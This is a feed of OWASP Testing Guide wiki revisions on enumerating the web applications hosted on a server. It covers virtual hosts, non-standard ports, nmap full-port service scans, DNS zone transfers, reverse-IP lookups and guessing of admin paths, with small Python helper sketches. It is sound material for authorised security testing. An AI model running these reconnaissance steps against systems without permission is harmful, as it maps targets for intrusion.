&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered as much information as you can with the previous techniques, you can rely on search engines to refine and extend your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11826</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11826"/>
				<updated>2006-11-06T08:54:32Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a Web presence is to find out which particular applications are hosted on a Web Server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies that can be exploited in order to gain remote control and/or access to data.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition, many applications are often hosted on a particular web server without any reference from the main website: this is typical of internal and/or extranet websites, which may be misconfigured or left out of date due to the perception that they are used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Moreover, many applications use common paths for their administrative interfaces, which can be used to guess or brute-force administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or maybe just one) as a target to test. No other knowledge. It is arguable that this setting is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things...). The problem is, the given IP address hosts an http service on port 80, but if you access it specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a number of web applications, associated with unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by whether you test all of these applications, only some of them, or none at all - because you don't notice them, or you notice only some of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even be aware of that! (This is more likely to happen in large organizations.)&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying the web applications hosted on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may also consist of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should be as comprehensive in scope as possible, i.e. it should first identify all the applications accessible through the given target. In the following, we will examine a few techniques that can be employed to achieve this goal.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case, the URL http://www.example.com/ would not be associated with a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no reason to publish web applications in this way, unless you deliberately do not want them to be accessible in a standard way and are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location are not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated with the DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be used to serve different content through so-called virtual hosts. The information specifying which virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
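At the protocol level, the selection happens in a single header line. The following minimal Python sketch (host names taken from the example above) builds the raw HTTP/1.1 request and shows that only the ''Host:'' line differs between virtual hosts:&lt;br /&gt;

```python
# Sketch: the Host header is the only part of an HTTP/1.1 request that
# selects the virtual host. Host names are the illustrative ones above.

def raw_request(host, path="/"):
    """Minimal HTTP/1.1 GET; the Host header is mandatory per RFC 2616."""
    return ("GET {} HTTP/1.1\r\n"
            "Host: {}\r\n"
            "Connection: close\r\n\r\n").format(path, host).encode()

for name in ("www.example.com", "helpdesk.example.com", "webmail.example.com"):
    # Print only the Host line - the rest of the request is identical.
    print(raw_request(name).decode().splitlines()[1])
```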
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no foolproof way to ascertain the existence of web applications published at non-standard URLs. Being non-standard, there is no magic recipe for finding them. However, there are a couple of techniques which may aid in the search.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Our first hope is that these applications are referenced by other web pages; if so, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examine the result of a query for “site:www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, even though this URL is not referenced anywhere (after all, employees know where the webmail application is located, and there is no reason to advertise it to outsiders on the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: a Tomcat administrative interface) and yet not be referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.&lt;br /&gt;
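A minimal sketch of such dictionary-style guessing, with a tiny illustrative wordlist (real scanners ship far larger ones):&lt;br /&gt;

```python
# Sketch: expand a base URL into candidate locations of unpublished
# applications. The wordlist is a tiny illustrative sample.
from urllib.parse import urljoin

COMMON_PATHS = ["webmail", "admin", "manager/html", "phpmyadmin", "cpanel"]

def candidates(base):
    """Return candidate URLs worth probing under the given base URL."""
    return [urljoin(base, p) for p in COMMON_PATHS]

for url in candidates("https://www.example.com/"):
    print(url)
```

Each candidate would then be requested, keeping those that answer with something other than an error page.&lt;br /&gt;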
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will probe, with a TCP connect scan, all TCP ports on IP ''192.168.1.100'' and will try to determine which services are bound to them (only the ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''nmap -P0 -sT -sV -p1-65535 192.168.1.100''&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
It is then sufficient to examine the output and look for http or an indication of SSL-wrapped services (which should be probed to confirm that they are https).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – in addition to what nmap offers – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There are a number of techniques which may be used to identify the DNS names associated with a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is of limited use nowadays, since zone transfer requests are largely refused by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, you must determine the name server serving ''x.y.z.t''. Matters may get complicated here, because there could be several such servers. You may know a name server because it was given as part of the target to be assessed (say, ''dns.example.com''). You can query ''dns.example.com'' by means of tools such as ''nslookup'' or ''dig'' and, if you are lucky, get back a list of the DNS entries for the domain ''example.com''. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer, and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
If you don’t know a name server, you can look up ''whois'' information for the given IP address, contact the name servers listed there, and request a zone transfer as described above.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic-name mappings, which is not guaranteed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to a DNS zone transfer, but relies on web-based services that allow you to perform name-based searches on DNS. One such service is ''Netcraft Search DNS'', available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com'', and then check whether the names you obtained pertain to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to inverse DNS queries, with the difference that you query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive picture.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered as much information as you can with the previous techniques, you can rely on search engines to refine and extend your analysis. This may yield evidence of additional symbolic names belonging to your target, or of applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11825</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11825"/>
				<updated>2006-11-06T08:44:10Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step in testing for vulnerabilities in a web presence is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many applications have known vulnerabilities and known attack strategies that can be exploited in order to gain remote control or to compromise data.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition, many applications are often hosted on a given web server without being referenced from the main website: this is true of internal and/or extranet websites, which may be misconfigured or left out of date due to the perception that they are only used &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use common paths for their administrative interfaces, which can be used to guess or brute-force administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or maybe just one) as a target to test, with no other knowledge. It is arguable that this setting is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things...). The problem is, the given IP address hosts an http service on port 80, but if you access it by specifying the IP address (which is all you know), it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. Yet that system could &amp;quot;hide&amp;quot; a number of web applications, associated with unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by whether you test all of these applications, or miss some of them - because you don't notice them, or you notice only some of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey only partial information, i.e., it could omit some symbolic names – and the client might not even be aware of that! (This is more likely to happen in large organizations.)&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may also consist of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be as comprehensive in scope as possible, i.e., it should first identify all the applications accessible through the given target. In the following, we will examine a few techniques that can be employed to achieve this goal.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e., with this shorthand notation we mean the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated with three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case, the URL http://www.example.com/ would not be associated with a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e., we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way unless you don’t want them to be accessible in a standard way and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location are not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated with the DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (it is not actually necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be used to serve different content through so-called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
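To make the mechanism concrete, the following sketch builds the raw HTTP/1.1 requests that would all be sent to the same IP address, distinguished only by the ''Host:'' header (the host names are the illustrative ones used above; actually sending the requests would of course require network access):&lt;br /&gt;

```python
# Sketch: three requests to the same IP address, distinguished only by
# the Host header, which is how HTTP 1.1 virtual hosting works.
def build_request(hostname, path="/"):
    """Build a raw HTTP/1.1 GET request for the virtual host `hostname`."""
    return ("GET {} HTTP/1.1\r\n"
            "Host: {}\r\n"
            "Connection: close\r\n\r\n").format(path, hostname)

# All three would be sent to 192.168.1.100; the server chooses which
# site to serve based solely on the Host header value.
requests = [build_request(name) for name in
            ("www.example.com", "helpdesk.example.com", "webmail.example.com")]
```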
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no foolproof way to ascertain the existence of non-standard-named web applications; being non-standard, there is no fixed recipe for finding them. However, a couple of criteria may aid in their discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Our first hope is that these applications are referenced by other web pages; if so, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'', we could, for example, do a bit of googling using the ''site'' operator and examine the results of a query for “site:www.example.com”. Among the returned URLs, there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which are likely candidates for non-published applications. For example, a webmail front end might be accessible from a URL such as https://www.example.com/webmail even though this URL is not referenced anywhere (after all, employees know where the webmail application is located, and there is no reason to reveal this information to outsiders by publishing it on the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example, a Tomcat administrative interface) and yet not be referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.&lt;br /&gt;
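A minimal sketch of such dictionary-style guessing is shown below. The wordlist is a tiny illustrative sample (real tools ship far larger lists), and only URL construction is shown – an actual probe would issue one request per candidate and keep those not answering 404:&lt;br /&gt;

```python
# Sketch: dictionary-style guessing of non-published application paths.
# COMMON_PATHS is an illustrative sample, not an exhaustive wordlist.
from urllib.parse import urljoin

COMMON_PATHS = ["webmail/", "admin/", "manager/html", "phpmyadmin/"]

def candidate_urls(base):
    """Return candidate URLs to probe for unadvertised applications."""
    return [urljoin(base, path) for path in COMMON_PATHS]

# An actual scan would request each URL and record non-404 responses.
urls = candidate_urls("https://www.example.com/")
```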
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope). &amp;lt;br&amp;gt;&lt;br /&gt;
nmap -P0 -sT -sV -p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and look for http or https (or SSL-wrapped services).&lt;br /&gt;
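Picking the interesting ports out of the scanner output can be done by eye, or mechanically, as in this sketch (the sample lines are illustrative of nmap's normal output format):&lt;br /&gt;

```python
# Sketch: pick out http(s) services from nmap -sV output.
# SAMPLE is illustrative; feed in real scanner output in practice.
SAMPLE = """\
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 4.3
80/tcp    open  http     Apache httpd 2.2.3
443/tcp   open  ssl/http Apache httpd 2.2.3
20000/tcp open  http     Jetty 6.1.x
"""

def http_ports(nmap_output):
    """Return TCP ports whose detected service looks like http(s)."""
    ports = []
    for line in nmap_output.splitlines():
        fields = line.split()
        if len(fields) >= 3 and fields[1] == "open" and "http" in fields[2]:
            ports.append(int(fields[0].split("/")[0]))
    return ports
```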
&amp;lt;br&amp;gt;&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There are a number of techniques which may be used to identify the DNS names associated with a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is of limited use nowadays, since zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, you must determine the name server serving ''x.y.z.t''. Matters may get complicated here, because there could be several such servers. You may know a name server because it was given as part of the target to be assessed (say, ''dns.example.com''). You can query ''dns.example.com'' by means of tools such as ''nslookup'' or ''dig'' and, if you are lucky, get back a list of the DNS entries for the domain ''example.com''. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer, and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
If you don’t know a name server, you can look up ''whois'' information for the given IP address, contact the name servers listed there, and request a zone transfer as described above.&lt;br /&gt;
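A transfer can be requested with, e.g., ''dig @dns.example.com example.com AXFR''. Since a live transfer needs a cooperating name server, the sketch below only shows how to collect host names from dig's output (the sample records are illustrative):&lt;br /&gt;

```python
# Sketch: collecting host names from zone-transfer (AXFR) output.
# SAMPLE_AXFR is illustrative output; real data would come from
# running:  dig @dns.example.com example.com AXFR
SAMPLE_AXFR = """\
example.com.          3600  IN  SOA    dns.example.com. admin.example.com. 1 2 3 4 5
www.example.com.      3600  IN  A      192.168.1.100
helpdesk.example.com. 3600  IN  A      192.168.1.100
webmail.example.com.  3600  IN  CNAME  www.example.com.
"""

def names_from_axfr(text):
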